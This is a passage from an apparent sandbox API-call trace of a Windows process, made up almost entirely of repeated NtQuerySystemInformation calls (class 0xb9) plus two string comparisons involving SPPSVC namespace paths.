(SystemInformationClass=0xb9, SystemInformation=0xa78207c9b0, Length=0x20, ResultLength=0x0) [0286.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9b0, Length=0x20, ResultLength=0x0) [0286.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9b0, Length=0x20, ResultLength=0x0) [0286.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x38, ResultLength=0x0) [0286.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x20, ResultLength=0x0) [0286.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0286.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0286.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf28, Length=0x50, ResultLength=0x0) [0286.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce50, Length=0x38, ResultLength=0x0) [0286.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x28, ResultLength=0x0) [0286.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x28, ResultLength=0x0) [0286.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x28, ResultLength=0x0) [0286.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x28, ResultLength=0x0) [0286.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccf0, Length=0x28, ResultLength=0x0) [0286.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce50, Length=0x38, ResultLength=0x0) [0286.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd70, Length=0x28, ResultLength=0x0) [0287.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd70, Length=0x28, ResultLength=0x0) [0287.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce50, Length=0x38, ResultLength=0x0) [0287.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x20, ResultLength=0x0) [0287.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc50, Length=0x20, ResultLength=0x0) [0287.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc50, Length=0x20, ResultLength=0x0) [0287.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc50, Length=0x20, ResultLength=0x0) [0287.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce50, Length=0x38, ResultLength=0x0) [0287.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x20, ResultLength=0x0) [0287.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x20, ResultLength=0x0) [0287.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x20, ResultLength=0x0) [0287.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdd0, Length=0x50, ResultLength=0x0) [0287.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x38, ResultLength=0x0) [0287.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x28, ResultLength=0x0) [0287.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x28, ResultLength=0x0) [0287.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x28, ResultLength=0x0) [0287.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x28, ResultLength=0x0) [0287.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x28, ResultLength=0x0) [0287.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x38, ResultLength=0x0) [0287.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc20, Length=0x28, ResultLength=0x0) [0287.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc20, Length=0x28, ResultLength=0x0) [0287.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x38, ResultLength=0x0) [0287.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb80, Length=0x20, ResultLength=0x0) [0287.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x20, ResultLength=0x0) [0287.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x20, ResultLength=0x0) [0287.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x20, ResultLength=0x0) [0287.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x38, ResultLength=0x0) [0287.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb80, Length=0x20, ResultLength=0x0) [0287.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x20, ResultLength=0x0) [0287.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x20, ResultLength=0x0) [0287.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.019] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0287.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb8, Length=0x50, ResultLength=0x0) [0287.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x38, ResultLength=0x0) [0287.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x28, ResultLength=0x0) [0287.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x28, ResultLength=0x0) [0287.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x28, ResultLength=0x0) [0287.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb80, Length=0x28, ResultLength=0x0) [0287.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x38, ResultLength=0x0) [0287.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x28, ResultLength=0x0) [0287.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x28, ResultLength=0x0) [0287.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x38, ResultLength=0x0) [0287.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x20, ResultLength=0x0) [0287.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x20, ResultLength=0x0) [0287.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x20, ResultLength=0x0) [0287.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x20, ResultLength=0x0) [0287.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x38, ResultLength=0x0) [0287.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x20, ResultLength=0x0) [0287.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x20, ResultLength=0x0) [0287.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x20, ResultLength=0x0) [0287.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d140, Length=0x50, ResultLength=0x0) [0287.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0c0, Length=0x28, ResultLength=0x0) [0287.028] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0287.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d140, Length=0x50, ResultLength=0x0) [0287.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d140, Length=0x50, ResultLength=0x0) [0287.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d140, Length=0x50, ResultLength=0x0) [0287.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d070, Length=0x38, ResultLength=0x0) [0287.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cea0, Length=0x28, ResultLength=0x0) [0287.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cea0, Length=0x28, ResultLength=0x0) [0287.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cea0, Length=0x28, ResultLength=0x0) [0287.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf10, Length=0x28, ResultLength=0x0) [0287.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d070, Length=0x38, ResultLength=0x0) [0287.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf90, Length=0x28, ResultLength=0x0) [0287.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf90, Length=0x28, ResultLength=0x0) [0287.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d070, Length=0x38, ResultLength=0x0) [0287.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cef0, Length=0x20, ResultLength=0x0) [0287.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce70, Length=0x20, ResultLength=0x0) [0287.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce70, Length=0x20, ResultLength=0x0) [0287.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce70, Length=0x20, ResultLength=0x0) [0287.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d070, Length=0x38, ResultLength=0x0) [0287.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cef0, Length=0x20, ResultLength=0x0) [0287.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce80, Length=0x20, ResultLength=0x0) [0287.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce80, Length=0x20, ResultLength=0x0) [0287.039] NtQuerySystemInformation 